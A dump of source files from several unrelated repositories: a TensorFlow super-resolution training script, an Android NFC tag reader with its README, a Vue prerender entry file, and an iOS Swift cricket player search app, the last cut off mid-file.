        'b15': tf.get_variable('b15', shape=[64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
        'b16': tf.get_variable('b16', shape=[64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
        'b17': tf.get_variable('b17', shape=[1], initializer=tf.contrib.layers.xavier_initializer_conv2d())
    }
with tf.device(device):
    # VDSR-style stack: sixteen ReLU conv layers, one final linear conv,
    # and a global residual connection from the input.
    conv1 = tf.nn.relu(tf.nn.conv2d(X, weights['w1'], strides=[1, 1, 1, 1], padding='SAME') + biases['b1'])
    conv2 = tf.nn.relu(tf.nn.conv2d(conv1, weights['w2'], strides=[1, 1, 1, 1], padding='SAME') + biases['b2'])
    conv3 = tf.nn.relu(tf.nn.conv2d(conv2, weights['w3'], strides=[1, 1, 1, 1], padding='SAME') + biases['b3'])
    conv4 = tf.nn.relu(tf.nn.conv2d(conv3, weights['w4'], strides=[1, 1, 1, 1], padding='SAME') + biases['b4'])
    conv5 = tf.nn.relu(tf.nn.conv2d(conv4, weights['w5'], strides=[1, 1, 1, 1], padding='SAME') + biases['b5'])
    conv6 = tf.nn.relu(tf.nn.conv2d(conv5, weights['w6'], strides=[1, 1, 1, 1], padding='SAME') + biases['b6'])
    conv7 = tf.nn.relu(tf.nn.conv2d(conv6, weights['w7'], strides=[1, 1, 1, 1], padding='SAME') + biases['b7'])
    conv8 = tf.nn.relu(tf.nn.conv2d(conv7, weights['w8'], strides=[1, 1, 1, 1], padding='SAME') + biases['b8'])
    conv9 = tf.nn.relu(tf.nn.conv2d(conv8, weights['w9'], strides=[1, 1, 1, 1], padding='SAME') + biases['b9'])
    conv10 = tf.nn.relu(tf.nn.conv2d(conv9, weights['w10'], strides=[1, 1, 1, 1], padding='SAME') + biases['b10'])
    conv11 = tf.nn.relu(tf.nn.conv2d(conv10, weights['w11'], strides=[1, 1, 1, 1], padding='SAME') + biases['b11'])
    conv12 = tf.nn.relu(tf.nn.conv2d(conv11, weights['w12'], strides=[1, 1, 1, 1], padding='SAME') + biases['b12'])
    conv13 = tf.nn.relu(tf.nn.conv2d(conv12, weights['w13'], strides=[1, 1, 1, 1], padding='SAME') + biases['b13'])
    conv14 = tf.nn.relu(tf.nn.conv2d(conv13, weights['w14'], strides=[1, 1, 1, 1], padding='SAME') + biases['b14'])
    conv15 = tf.nn.relu(tf.nn.conv2d(conv14, weights['w15'], strides=[1, 1, 1, 1], padding='SAME') + biases['b15'])
    conv16 = tf.nn.relu(tf.nn.conv2d(conv15, weights['w16'], strides=[1, 1, 1, 1], padding='SAME') + biases['b16'])
    # Fix: the final layer previously consumed conv2, which left layers
    # 3-16 disconnected from the output (dead computation). VDSR chains
    # the last (linear) conv onto conv16.
    conv17 = tf.nn.conv2d(conv16, weights['w17'], strides=[1, 1, 1, 1], padding='SAME') + biases['b17']
    # Residual learning: the network predicts the detail added to the input.
    out = tf.add(X, conv17)
    loss = tf.reduce_mean(tf.square(Y - out))
    optm = tf.train.AdamOptimizer(learning_rate).minimize(loss)
with tf.device(device):
    # Fresh session with all model variables initialised.
    sess = tf.Session()
    sess.run(tf.global_variables_initializer())
# Dataset layout: bicubic x2 upscaled inputs, HR ground truth, outputs.
train_path='images/train_bicubic_x2/'
label_path='images/train_HR/'
result_path='results/SRCNN_v1/'
with tf.device(device):
    # Training loop: random mini-batches of image ids in [1, 800]; PSNR is
    # averaged per epoch and the last batch's outputs are saved to disk.
    for epoch in range(epoch_size):
        avr_psnr = 0
        # int(): stays safe even if total_iter is a float under Python 3.
        for i in range(int(total_iter)):
            index = np.random.choice(800, batch_size, replace=False) + 1
            train_image = imread(path=train_path, index=index, is_train=True, scale=2)
            label_image = imread(path=label_path, index=index)
            sess.run(optm, feed_dict={X: train_image, Y: label_image})
            tr_loss = sess.run(loss, feed_dict={X: train_image, Y: label_image})
            # PSNR for images normalised to [0, 1].
            psnr = 20 * np.log10(1. / np.sqrt(tr_loss))
            avr_psnr += psnr
        print ('epoch: %3d, Avr_PSNR: %4f' % (epoch, avr_psnr / total_iter))
        # Fix: save the network output. Previously conv3 (a 64-channel
        # feature map) was fetched, so channel 0 of an intermediate layer
        # was written out as the "srcnn" result.
        img = sess.run(out, feed_dict={X: train_image})
        for j in range(img.shape[0]):
            imsave(img[j, :, :, 0], result_path + 'srcnn' + str(j).zfill(4) + '.png')
            imsave(train_image[j, :, :, 0], result_path + 'interpol_' + str(j).zfill(4) + '.png')
| a5d66c53f882185521271bce397bb721be96294a | [
"Python"
] | 2 | Python | sjsong08/SuperResolution | 82473f62a2e6a791d0189c462bdfea6de8696c81 | 6c7cb1f4090024984cad5e29cfbf803e1fc37bac |
refs/heads/master | <repo_name>SaadBilal/SimpleNFC<file_sep>/README.md
# SimpleNFC
SimpleNFC is a project which includes an insanely easy way of reading NFC data
### Tech
SimpleNFC uses a number of open source libraries to work properly:
* [RXJava] - Reactive Extensions for the JVM
* [RXAndroid] - Reactive Extensions for Android
### Integrate for custom projects
Implement NFCInterface
```sh
public class MainActivity extends Activity implements NFCInterface{
....
```
Create Subscription local variable
```sh
private Subscription nfcSubscription;
```
Fill the implemented methods
```sh
@Override
protected void onResume() {
super.onResume();
PendingIntent pendingIntent = PendingIntent.getActivity(this, 0, new Intent(this,getClass()).addFlags(Intent.FLAG_ACTIVITY_SINGLE_TOP), 0);
IntentFilter filter = new IntentFilter();
filter.addAction(NfcAdapter.ACTION_TAG_DISCOVERED);
filter.addAction(NfcAdapter.ACTION_NDEF_DISCOVERED);
filter.addAction(NfcAdapter.ACTION_TECH_DISCOVERED);
NfcAdapter nfcAdapter = NfcAdapter.getDefaultAdapter(this);
nfcAdapter.enableForegroundDispatch(this, pendingIntent, new IntentFilter[]{filter}, this.techList);
}
@Override
protected void onPause() {
super.onPause();
// disabling foreground dispatch:
NfcAdapter nfcAdapter = NfcAdapter.getDefaultAdapter(this);
nfcAdapter.disableForegroundDispatch(this);
}
@Override
protected void onNewIntent(Intent intent) {
if (intent.getAction().equals(NfcAdapter.ACTION_TAG_DISCOVERED)) {
String type = intent.getType();
Tag tag = intent.getParcelableExtra(NfcAdapter.EXTRA_TAG);
nfcReader(tag);
}
}
@Override
public String nfcRead(Tag t) {
try {
Tag tag = t;
Ndef ndef = Ndef.get(tag);
if (ndef == null) {
return null;
}
NdefMessage ndefMessage = ndef.getCachedNdefMessage();
NdefRecord[] records = ndefMessage.getRecords();
for (NdefRecord ndefRecord : records)
{
if (ndefRecord.getTnf() == NdefRecord.TNF_WELL_KNOWN && Arrays.equals(ndefRecord.getType(), NdefRecord.RTD_TEXT))
{
try {return readText(ndefRecord);} catch (UnsupportedEncodingException e) {}
}
}
}
catch (Exception e)
{
return null;
}
return null;
}
@Override
public String readText(NdefRecord record) throws UnsupportedEncodingException {
byte[] payload = record.getPayload();
String textEncoding = ((payload[0] & 128) == 0) ? "UTF-8" : "UTF-16";
int languageCodeLength = payload[0] & 0063;
return new String(payload, languageCodeLength + 1, payload.length - languageCodeLength - 1, textEncoding);
}
@Override
public void nfcReader(Tag tag) {
nfcSubscription= Observable.just(nfcRead(tag))
.subscribeOn(Schedulers.newThread())
.observeOn(AndroidSchedulers.mainThread())
.subscribe(new Observer<String>() {
@Override
public void onCompleted() {
}
@Override
public void onError(Throwable e) {
}
@Override
public void onNext(String s) {
if (s != null) {
txtNFCID.setText(s);
}
}
});
}
```
Define onDestroy and unsubscribe on that
```sh
@Override
protected void onDestroy() {
super.onDestroy();
unsubscribe(nfcSubscription);
}
private static void unsubscribe(Subscription subscription) {
if (subscription != null && !subscription.isUnsubscribed()) {
subscription.unsubscribe();
subscription = null;
}
}
```
<file_sep>/app/src/main/java/com/apex/simplenfc/MainActivity.java
package com.apex.simplenfc;
import android.app.Activity;
import android.app.PendingIntent;
import android.content.Intent;
import android.content.IntentFilter;
import android.nfc.NdefMessage;
import android.nfc.NdefRecord;
import android.nfc.NfcAdapter;
import android.nfc.Tag;
import android.nfc.tech.Ndef;
import android.os.Environment;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.widget.TextView;
import com.apex.simplenfc.NFC.NFCInterface;
import java.io.File;
import java.io.UnsupportedEncodingException;
import java.util.Arrays;
import java.util.List;
import rx.Observable;
import rx.Observer;
import rx.Subscription;
import rx.android.schedulers.AndroidSchedulers;
import rx.schedulers.Schedulers;
/**
 * Demo activity that reads NDEF text records from NFC tags via foreground
 * dispatch, decodes them with RxJava, and shows the text in {@code txtNFCID}.
 */
public class MainActivity extends Activity implements NFCInterface {

    TextView txtNFCID;
    // Held so the in-flight read can be unsubscribed in onDestroy().
    private Subscription nfcSubscription;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        txtNFCID = (TextView) findViewById(R.id.txtNFCID);
    }

    @Override
    protected void onResume() {
        super.onResume();
        // Deliver tag-discovery intents to this already-running instance
        // instead of launching a new one.
        PendingIntent pendingIntent = PendingIntent.getActivity(this, 0,
                new Intent(this, getClass()).addFlags(Intent.FLAG_ACTIVITY_SINGLE_TOP), 0);
        IntentFilter filter = new IntentFilter();
        filter.addAction(NfcAdapter.ACTION_TAG_DISCOVERED);
        filter.addAction(NfcAdapter.ACTION_NDEF_DISCOVERED);
        filter.addAction(NfcAdapter.ACTION_TECH_DISCOVERED);
        NfcAdapter nfcAdapter = NfcAdapter.getDefaultAdapter(this);
        // techList is inherited from NFCInterface -- TODO confirm contents.
        nfcAdapter.enableForegroundDispatch(this, pendingIntent, new IntentFilter[]{filter}, this.techList);
    }

    @Override
    protected void onPause() {
        super.onPause();
        // Disable foreground dispatch while the activity is not visible.
        NfcAdapter nfcAdapter = NfcAdapter.getDefaultAdapter(this);
        nfcAdapter.disableForegroundDispatch(this);
    }

    @Override
    protected void onNewIntent(Intent intent) {
        if (intent.getAction().equals(NfcAdapter.ACTION_TAG_DISCOVERED)) {
            String type = intent.getType();
            Tag tag = intent.getParcelableExtra(NfcAdapter.EXTRA_TAG);
            nfcReader(tag);
        }
    }

    /**
     * Returns the first well-known text record's payload from the tag's
     * cached NDEF message, or null when the tag has no NDEF data or no
     * text record.
     */
    @Override
    public String nfcRead(Tag t) {
        try {
            Tag tag = t;
            Ndef ndef = Ndef.get(tag);
            if (ndef == null) {
                // Tag is not NDEF-formatted.
                return null;
            }
            NdefMessage ndefMessage = ndef.getCachedNdefMessage();
            NdefRecord[] records = ndefMessage.getRecords();
            for (NdefRecord ndefRecord : records) {
                if (ndefRecord.getTnf() == NdefRecord.TNF_WELL_KNOWN
                        && Arrays.equals(ndefRecord.getType(), NdefRecord.RTD_TEXT)) {
                    try {
                        return readText(ndefRecord);
                    } catch (UnsupportedEncodingException e) {
                        // Fix: log instead of silently swallowing the failure.
                        e.printStackTrace();
                    }
                }
            }
        } catch (Exception e) {
            return null;
        }
        return null;
    }

    /**
     * Decodes an NFC Forum Text RTD payload laid out as
     * [status byte][language code][text].
     */
    @Override
    public String readText(NdefRecord record) throws UnsupportedEncodingException {
        byte[] payload = record.getPayload();
        // Bit 7 of the status byte selects the text encoding.
        String textEncoding = ((payload[0] & 128) == 0) ? "UTF-8" : "UTF-16";
        // Fix: the language-code length is the LOW 6 BITS of the status
        // byte, mask 0x3F. The previous mask 0063 was an octal literal
        // (decimal 51) that only worked by accident for short codes.
        int languageCodeLength = payload[0] & 0x3F;
        return new String(payload, languageCodeLength + 1,
                payload.length - languageCodeLength - 1, textEncoding);
    }

    /**
     * Decodes the tag and posts the resulting text to the UI label on the
     * main thread.
     */
    @Override
    public void nfcReader(Tag tag) {
        // NOTE(review): Observable.just evaluates nfcRead(tag) eagerly on
        // the calling thread; Observable.fromCallable would actually defer
        // the read to the background scheduler.
        nfcSubscription = Observable.just(nfcRead(tag))
                .subscribeOn(Schedulers.newThread())
                .observeOn(AndroidSchedulers.mainThread())
                .subscribe(new Observer<String>() {
                    @Override
                    public void onCompleted() {
                    }

                    @Override
                    public void onError(Throwable e) {
                    }

                    @Override
                    public void onNext(String s) {
                        if (s != null) {
                            txtNFCID.setText(s);
                        }
                    }
                });
    }

    @Override
    protected void onDestroy() {
        super.onDestroy();
        unsubscribe(nfcSubscription);
    }

    private static void unsubscribe(Subscription subscription) {
        if (subscription != null && !subscription.isUnsubscribed()) {
            subscription.unsubscribe();
            // The former `subscription = null` only nulled the local
            // parameter (Java is pass-by-value) and was removed.
        }
    }
}
| 5f813631a050ab8a79e68ca9de2d37b1112e0a60 | [
"Markdown",
"Java"
] | 2 | Markdown | SaadBilal/SimpleNFC | 5f94c1648e54285608abaa1ccaa7220dcd115aed | b323e29470ed6e377eecb86b2c72b7de5f3571a5 |
refs/heads/master | <repo_name>have-not-BUG/prerender-demo<file_sep>/src/main.js
import Vue from 'vue'
import App from './App.vue'
import axios from 'axios';
import router from './router'
// Silence the production-mode hint in the console.
Vue.config.productionTip = false
// Expose axios on every component instance as this.$axios.
Vue.prototype.$axios = axios;
new Vue({
  render: h => h(App),
  router,
  // Delay 5 s so page requests and content finish loading and rendering
  // before the prerender snapshot is taken.
  mounted () {
    setTimeout(() => {
      console.log("dispatch event");
      // Signals a prerenderer configured with renderAfterDocumentEvent
      // ("render-event") that the page is ready -- TODO confirm config.
      window.document.dispatchEvent(new Event("render-event"));
    }, 5000);
  }
}).$mount("#app");
// document.addEventListener("DOMContentLoaded", () => {
// app.$mount("#app");
// });
| 368a187ff47d3ceb61954ed0adc834ab8b06b116 | [
"JavaScript"
] | 1 | JavaScript | have-not-BUG/prerender-demo | 23aeaa73b57c2850154e9a379b6eacbeb9db81ae | 864394447165f37159c11f4d7e29255a4139c427 |
refs/heads/master | <file_sep>//
// ViewController.swift
// PlayerFinder
//
// Created by Sarika on 26/06/19.
// Copyright © 2019 Airadmin. All rights reserved.
//
import UIKit
/// Search screen: queries the playerFinder endpoint as the user types and
/// pushes PlayerDetailViewController for the tapped result.
class SearchViewController: UIViewController, UITableViewDataSource, UITableViewDelegate, UISearchBarDelegate, UITextFieldDelegate
{
    // Outlet variables
    @IBOutlet weak var tableView: UITableView!
    @IBOutlet weak var searchBar: UISearchBar!
    @IBOutlet weak var guidanceLabel: UILabel!   // shows the "no player found" hint
    // Private Variables
    fileprivate var searchViewModel = SearchViewModel()

    override func viewDidLoad()
    {
        super.viewDidLoad()
        initUI()
    }

    /// One-time UI setup: suppress empty separator rows and set the title.
    func initUI()
    {
        tableView.tableFooterView = UIView()
        self.title = "Search"
    }

    // MARK:- TableView Datasource
    func numberOfSections(in tableView: UITableView) -> Int
    {
        return 1
    }

    func tableView(_ tableView: UITableView, numberOfRowsInSection section: Int) -> Int
    {
        return searchViewModel.data.count
    }

    /// One row per matched player, showing the full name.
    func tableView(_ tableView: UITableView, cellForRowAt indexPath: IndexPath) -> UITableViewCell
    {
        let searchPlayerCell = tableView.dequeueReusableCell(withIdentifier: "CID_SEARCH_PLAYER", for: indexPath)
        let curPlayer = searchViewModel.data[indexPath.row]
        searchPlayerCell.textLabel?.text = curPlayer.fullName
        return searchPlayerCell
    }

    // MARK: - TableView Delegate
    /// Pushes the detail screen, handing it the selected player's pid.
    func tableView(_ tableView: UITableView, didSelectRowAt indexPath: IndexPath)
    {
        let playerDetailVC = storyboard?.instantiateViewController(withIdentifier: "VID_PLAYER_DETAIL") as? PlayerDetailViewController
        playerDetailVC?.playerDetailViewModel.pidStr = "\(searchViewModel.data[indexPath.row].pid)"
        self.navigationController?.pushViewController(playerDetailVC!, animated: true)
    }

    //MARK: - UISearchBarDelegate delegate
    func searchBarCancelButtonClicked(_ searchBar: UISearchBar)
    {
        searchBar.resignFirstResponder()
    }

    /// Fires a search request on every keystroke.
    func searchBar(_ searchBar: UISearchBar, textDidChange searchText: String)
    {
        self.guidanceLabel.isHidden = true
        if AppUtility.sharedInstance.isNetworkConnected()
        {
            // NOTE(review): an indicator is started per keystroke and only
            // stopped on the success path -- the error branch returns early.
            startActivityIndicator()
            searchViewModel.searchPlayer(searchText) { (success, error) in
                guard error == nil else {
                    return
                }
                self.stopActivityIndicator()
                self.setUI()
            }
        }
        else
        {
            self.showAlert("Error", msg: "No internet connection")
        }
    }

    func searchBarSearchButtonClicked(_ searchBar: UISearchBar)
    {
        searchBar.resignFirstResponder()
    }

    /// Reloads the table and toggles the "no player found" hint.
    func setUI()
    {
        if self.searchViewModel.data.count == 0
        {
            self.guidanceLabel.isHidden = false
            self.guidanceLabel.text = "Oops, no player found with this name."
        }
        else
        {
            self.guidanceLabel.isHidden = true
        }
        self.tableView.reloadData()
    }
}
<file_sep>//
// PlayerDetailViewModel.swift
// PlayerFinder
//
// Created by Sarika on 02/07/19.
// Copyright © 2019 Airadmin. All rights reserved.
//
import Foundation
class PlayerDetailViewModel
{
var data : [PlayerDetail] = []
var removeKeyList = ["provider","ttl","creditsLeft","pid", "data", "v", "imageURL", "fullName"]
var profileImageUrlStr = ""
var pidStr = ""
func downloadImage(completion: @escaping ((Data?, Error?) ->Void))
{
NetworkService.getImageData(from: URL(string: profileImageUrlStr)!) { data, response, error in
guard let data = data, error == nil
else
{
return
}
DispatchQueue.main.async() {
completion(data, nil)
}
}
}
func getData(completion: @escaping ((Bool, Error?) ->Void))
{
NetworkService.getData(PLAYER_STATS_WS_URL, parameters: ["pid":pidStr], completion: { (data, error) in
guard error == nil, let data = data else {
return
}
do {
if let json = try JSONSerialization.jsonObject(with: data, options: .mutableContainers) as? [String: Any]
{
self.profileImageUrlStr = AppUtility.isValid(json["imageURL"] as? String) ? json["imageURL"] as! String : ""
var skillDetail = [SkillDetail]()
for bioKey in Array(json.keys)
{
if !(self.checkKeyPresent(bioKey))
{
let skillValue = AppUtility.isValid(json[bioKey] as? String) ? (json[bioKey] as! String) : ""
if bioKey == "name"
{
skillDetail.insert((SkillDetail(skillKey : bioKey, skillValue : skillValue)), at: 0)
}
else
{
skillDetail.append(SkillDetail(skillKey : bioKey, skillValue : skillValue))
}
}
}
self.data.append(PlayerDetail(title : "Bio", highlight : true, isOpen : true, sectionType: .Bio , skillDetail : skillDetail))
if let skillData = json["data"] as? [String : Any]
{
for skillKey in skillData.keys
{
skillDetail = []
let sectionType : TableSection = skillKey == "batting" ? .Batting : .Bowling
self.data.append(PlayerDetail(title : skillKey, highlight : true, isOpen : false, sectionType: sectionType , skillDetail : skillDetail))
skillDetail = []
if let gameType = skillData[skillKey] as? [String : Any]
{
if gameType.keys.count == 0
{
self.data.removeLast()
}
for gameKey in gameType.keys
{
if let gameDetails = gameType[gameKey] as? [String : Any]
{
for key in Array(gameDetails.keys)
{
skillDetail.append(SkillDetail(skillKey : key, skillValue : gameDetails[key] as! String))
}
self.data.append(PlayerDetail(title : gameKey, highlight : false , isOpen : false, sectionType: sectionType, skillDetail : skillDetail))
}
}
}
}
}
DispatchQueue.main.async
{
completion(true, nil)
}
}
else
{
throw (ErrorStatement.FoundNil("PlayerData"))
}
}
catch
{
print("Error: \(error)")
}
})
}
func checkKeyPresent( _ toSearchKey : String) -> Bool
{
var isPresent = false
for key in removeKeyList
{
if key == toSearchKey
{
isPresent = true
break
}
}
return isPresent
}
}
<file_sep>//
// PlayerDetailViewController.swift
// PlayerFinder
//
// Created by Sarika on 26/06/19.
// Copyright © 2019 Airadmin. All rights reserved.
//
import UIKit
/// Shows one player's bio and batting/bowling stats in collapsible table
/// sections, plus the profile image when one is available.
class PlayerDetailViewController: UIViewController, UITableViewDataSource, UITableViewDelegate, UIGestureRecognizerDelegate
{
    // Outlet Variables
    @IBOutlet weak var tableView: UITableView!
    @IBOutlet weak var userProfile: UIImageView!
    var playerDetailViewModel = PlayerDetailViewModel()

    override func viewDidLoad()
    {
        super.viewDidLoad()
        initUI()
    }

    /// Kicks off the stats fetch, showing a spinner while it runs.
    func initUI()
    {
        tableView.tableFooterView = UIView()
        self.title = "Player Detail"
        startActivityIndicator()
        if AppUtility.sharedInstance.isNetworkConnected()
        {
            playerDetailViewModel.getData { (success, error) in
                if success
                {
                    self.stopActivityIndicator()
                    self.setUI()
                }
            }
        }
        else
        {
            self.showAlert("Error", msg: "No internet connection")
        }
    }

    // MARK: - TableView Datasource
    func numberOfSections(in tableView: UITableView) -> Int
    {
        return playerDetailViewModel.data.count
    }

    /// Collapsed sections report zero rows.
    func tableView(_ tableView: UITableView, numberOfRowsInSection section: Int) -> Int
    {
        let sectionData = playerDetailViewModel.data[section]
        let rowCount = sectionData.isOpen == true ? sectionData.skillDetail.count : 0
        return rowCount
    }

    /// "Key : value" rows; bio rows may wrap onto multiple lines.
    func tableView(_ tableView: UITableView, cellForRowAt indexPath: IndexPath) -> UITableViewCell
    {
        let playerDetailCell = tableView.dequeueReusableCell(withIdentifier: "CID_SEARCH_PLAYER", for: indexPath)
        let curSkill = playerDetailViewModel.data[indexPath.section].skillDetail[indexPath.row]
        playerDetailCell.textLabel?.numberOfLines = indexPath.section == TableSection.Bio.rawValue ? 0 : 1
        playerDetailCell.textLabel?.text = ("\(curSkill.skillKey) : \(curSkill.skillValue)").firstUppercased
        return playerDetailCell
    }

    // MARK: - TableView Delegate
    /// Builds a tappable header: black for highlighted (Bio / skill name)
    /// sections, gray with a plus/minus toggle icon for format sections.
    func tableView(_ tableView: UITableView, viewForHeaderInSection section: Int) -> UIView?
    {
        let curSection = playerDetailViewModel.data[section]
        let headerHeight = curSection.highlight ? 50 : 40
        var headerView : UIView?
        headerView = UIView(frame: CGRect(x: 0, y: 0, width: Int(tableView.frame.size.width), height: headerHeight))
        headerView?.backgroundColor = curSection.highlight ? UIColor.black : UIColor.lightGray
        // The tag carries the section index to handleTap.
        headerView?.tag = section
        let tapRecognizer = UITapGestureRecognizer(target: self, action: #selector(handleTap))
        tapRecognizer.delegate = self
        tapRecognizer.numberOfTapsRequired = 1
        headerView?.addGestureRecognizer(tapRecognizer)
        let expandImage = UIImageView(frame: CGRect(x: Int(tableView.frame.size.width - 40), y: Int(headerView!.frame.size.height/2 - 10), width: 20, height: 20))
        expandImage.tag = 101
        expandImage.image = UIImage(named: curSection.isOpen ? "minus" : "plus")
        // Highlighted headers are not collapsible, so hide the toggle icon.
        expandImage.isHidden = curSection.highlight ? true : false
        headerView?.addSubview(expandImage)
        let headerLabel = UILabel(frame: CGRect(x: 20, y: 0, width: Int(tableView.frame.size.width - 40), height: headerHeight))
        headerLabel.text = curSection.title.firstUppercased
        headerLabel.textColor = curSection.highlight ? UIColor.white : UIColor.black
        headerView?.addSubview(headerLabel)
        return headerView!
    }

    /// Toggles the tapped section open/closed (the Bio section stays open).
    @objc func handleTap(gestureRecognizer: UIGestureRecognizer)
    {
        if let index = gestureRecognizer.view?.tag, index != TableSection.Bio.rawValue
        {
            if playerDetailViewModel.data[index].isOpen == true
            {
                playerDetailViewModel.data[index].isOpen = false
            }
            else
            {
                playerDetailViewModel.data[index].isOpen = true
            }
            tableView.reloadData()
        }
    }

    func tableView(_ tableView: UITableView, heightForHeaderInSection section: Int) -> CGFloat
    {
        return playerDetailViewModel.data[section].highlight == true ? 50.0 : 40.0
    }

    /// Bio rows grow with their text (minimum 40 pt); all others are 40 pt.
    func tableView(_ tableView: UITableView, heightForRowAt indexPath: IndexPath) -> CGFloat
    {
        let curSkill = playerDetailViewModel.data[indexPath.section].skillDetail[indexPath.row]
        var rowHeight = 40.0
        if indexPath.section == TableSection.Bio.rawValue
        {
            if AppUtility.isValid(curSkill.skillValue)
            {
                let str = "\(curSkill.skillKey) : \(curSkill.skillValue)"
                rowHeight = Double(str.height(withConstrainedWidth: self.view.frame.width/2, font: UIFont.systemFont(ofSize: 12.5))) + 20
                rowHeight = rowHeight < 40 ? 40 : rowHeight
            }
        }
        return CGFloat(rowHeight)
    }

    // MARK: - Other Function
    /// Reloads the table and, when a URL was parsed, loads the avatar.
    func setUI()
    {
        tableView.reloadData()
        if AppUtility.isValid(playerDetailViewModel.profileImageUrlStr)
        {
            playerDetailViewModel.downloadImage { (data, error) in
                guard error == nil, let data = data else {
                    return
                }
                self.userProfile.image = UIImage(data: data)
            }
        }
    }
}
<file_sep>//
// SearchPlayerResponse.swift
// PlayerFinder
//
// Created by <NAME> on 01/07/19.
// Copyright © 2019 Airadmin. All rights reserved.
//
import Foundation
/// Top-level playerFinder response: a list of matching players.
struct SearchPlayerResponse : Codable
{
    var data : [SearchPlayerData]
}
/// One playerFinder match.
struct SearchPlayerData : Codable
{
    // Unique player id, used as "pid" by the playerStats endpoint.
    var pid : Int
    var fullName : String
    var name : String
}
<file_sep>//
// NetworkService.swift
// PlayerFinder
//
// Created by Sarika on 27/06/19.
// Copyright © 2019 Airadmin. All rights reserved.
//
import Foundation
/// Thin URLSession wrapper for the cricapi.com endpoints used by the app.
class NetworkService
{
    /**
     Performs a GET against `wsURL` (absolute, or relative to BASE_WS_URL),
     always appending the `apikey` query item plus the given parameters.
     - parameter wsURL: endpoint alias or absolute URL.
     - parameter parameters: extra query parameters; values must be Strings.
     - parameter completion: called with (data, nil) on success or
       (nil, error) on transport failure; runs on a URLSession queue.
     */
    class func getData(_ wsURL: String, parameters : Dictionary <String,Any>?, completion: @escaping ((Data?, Error?) ->Void))
    {
        if AppUtility.isValid(wsURL)
        {
            // Accept either a fully-qualified URL or a bare endpoint name.
            var requestUrl : String = ""
            if wsURL.contains(BASE_WS_URL)
            {
                requestUrl = wsURL
            }
            else
            {
                requestUrl = BASE_WS_URL + wsURL
            }
            let requestDict = parameters
            var urlComponents = URLComponents(string: requestUrl)!
            // The API key is always the first query item.
            let keyQueryItem = URLQueryItem(name: "apikey", value: API_KEY)
            var arrQueryItems = [URLQueryItem]()
            arrQueryItems.append(keyQueryItem)
            if let keyArr = requestDict?.keys
            {
                for key in Array(keyArr)
                {
                    arrQueryItems.append(URLQueryItem(name: key, value: (requestDict![key] as! String)))
                }
            }
            // Assign once; the former append-to-optional before this
            // assignment was a dead write and has been removed.
            urlComponents.queryItems = arrQueryItems
            if let url = urlComponents.url
            {
                var request = URLRequest(url: url )
                request.httpMethod = "GET"
                URLSession.shared.dataTask(with: request, completionHandler: { receivedData, response, error -> Void in
                    if let receivedData = receivedData
                    {
                        let response = NSString (data: receivedData, encoding: String.Encoding.utf8.rawValue)
                        print("response is \(String(describing: response))")
                        completion(receivedData, nil)
                    }
                    else
                    {
                        // Fix: the previous `error!.localizedDescription as! Error`
                        // force-cast a String to Error and always crashed.
                        // Propagate the Error itself.
                        completion(nil, error)
                    }
                }).resume()
            }
        }
    }

    /// Streams raw bytes from `url`; completion runs on a URLSession queue.
    class func getImageData(from url: URL, completion: @escaping (Data?, URLResponse?, Error?) -> ())
    {
        URLSession.shared.dataTask(with: url, completionHandler: completion).resume()
    }

    /**
     GETs `wsURL` verbatim and decodes the body as SearchPlayerResponse.
     NOTE: unlike getData, this does not append the apikey -- callers must
     pass a complete URL.
     */
    class func getSearchData (_ wsURL: String, parameters : Dictionary <String,String>?, completion: @escaping ((SearchPlayerResponse?, Error?) ->Void))
    {
        let url = URL(string: wsURL)!
        let request = URLRequest(url: url)
        let task = URLSession.shared.dataTask(with: request) { data, response, error in
            guard let data = data, error == nil else {
                // Fix: report transport errors instead of silently returning.
                completion(nil, error)
                return
            }
            do {
                let decoder = JSONDecoder()
                if let playerData = try? decoder.decode(SearchPlayerResponse.self, from: data)
                {
                    completion(playerData,nil)
                }
                else
                {
                    throw (ErrorStatement.FoundNil("Player Data"))
                }
            }
            catch
            {
                // Fix: propagate the Error itself rather than force-casting
                // its description String to Error (which always crashed).
                completion(nil, error)
            }
        }
        task.resume()
    }
}
<file_sep>//
// SearchViewModel.swift
// PlayerFinder
//
// Created by Sarika on 02/07/19.
// Copyright © 2019 Airadmin. All rights reserved.
//
import Foundation
/// View model backing SearchViewController: holds the current result set
/// and runs name searches against the playerFinder endpoint.
class SearchViewModel
{
    // Most recent search results; replaced wholesale on every query.
    var data : [SearchPlayerData] = []

    /// Queries playerFinder for `userNameToSearch`, decodes the response,
    /// and replaces `data` on the main queue before calling `completion`.
    func searchPlayer(_ userNameToSearch:String, completion: @escaping ((Bool, Error?) ->Void))
    {
        NetworkService.getData(PlAYER_FINDER_WS_URL, parameters: ["name": userNameToSearch], completion: { (responseData, error) in
            guard error == nil, let responseData = responseData else {
                // NOTE(review): transport errors are swallowed here; the
                // caller's completion never fires on this path.
                //handle the error here
                return
            }
            do {
                let decoder = JSONDecoder()
                if let playerData = try? decoder.decode(SearchPlayerResponse.self, from: responseData)
                {
                    DispatchQueue.main.async
                    {
                        self.data.removeAll()
                        self.data = playerData.data
                        completion(true, nil)
                    }
                }
                else
                {
                    throw (ErrorStatement.FoundNil("PlayerData"))
                }
            }
            catch
            {
                print("Error: \(error)")
            }
        })
    }
}
<file_sep>//
// AppUtility.swift
// PlayerFinder
//
// Created by Sarika on 27/06/19.
// Copyright © 2019 Airadmin. All rights reserved.
//
import Foundation
import UIKit
/// Miscellaneous app-wide helpers (string validation, reachability).
class AppUtility
{
    static let sharedInstance = AppUtility()
    // Private so the singleton is the only instance.
    private init()
    {
    }
    /**
     Use to check string is valid or not.
     nil, whitespace-only, and the literal "<null>" all count as invalid.
     - Returns : Bool result string validation
     */
    class func isValid(_ string: String?) -> Bool
    {
        var result : Bool = true
        if string == nil || string!.trimmingCharacters(in: CharacterSet.whitespacesAndNewlines) == "" || string == "<null>"
        {
            result = false
        }
        return result
    }
    /**
     Use to check internet connectivity (WiFi or cellular).
     - Returns : Bool result connectivity status
     */
    func isNetworkConnected() -> Bool
    {
        var result = false
        let reach = Reachability.forInternetConnection()
        if reach!.isReachableViaWiFi() || reach!.isReachableViaWWAN()
        {
            result = true
        }
        return result
    }
}
extension UIViewController
{
    /**
     UIViewController extension.
     Shows a UIAlertController with an optional title and a message; does
     nothing when the message is empty/invalid.
     */
    func showAlert( _ screenTitle: String?,msg:String?)
    {
